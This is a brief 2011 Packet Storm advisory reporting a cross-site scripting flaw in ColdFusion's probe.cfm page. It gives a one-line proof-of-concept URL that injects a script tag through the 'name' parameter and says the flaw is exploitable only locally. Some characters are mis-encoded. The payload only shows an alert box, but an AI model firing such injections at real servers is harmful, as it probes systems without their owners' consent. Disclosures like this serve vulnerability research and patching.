ColdFusion probe.cfm Cross Site Scripting

2011-08-19T00:00:00
ID PACKETSTORM:104181
Type packetstorm
Reporter Rem7ter
Modified 2011-08-19T00:00:00

Description

                                        
                                            ` *Describe£º*ColdFusion probe.cfm page local parameter can xss  
  
*CVE£º*Unknow  
  
*PoC£º*  
  
http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>  
URL.Name parameter can xss only local.  
  
Or visit:  
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html  
`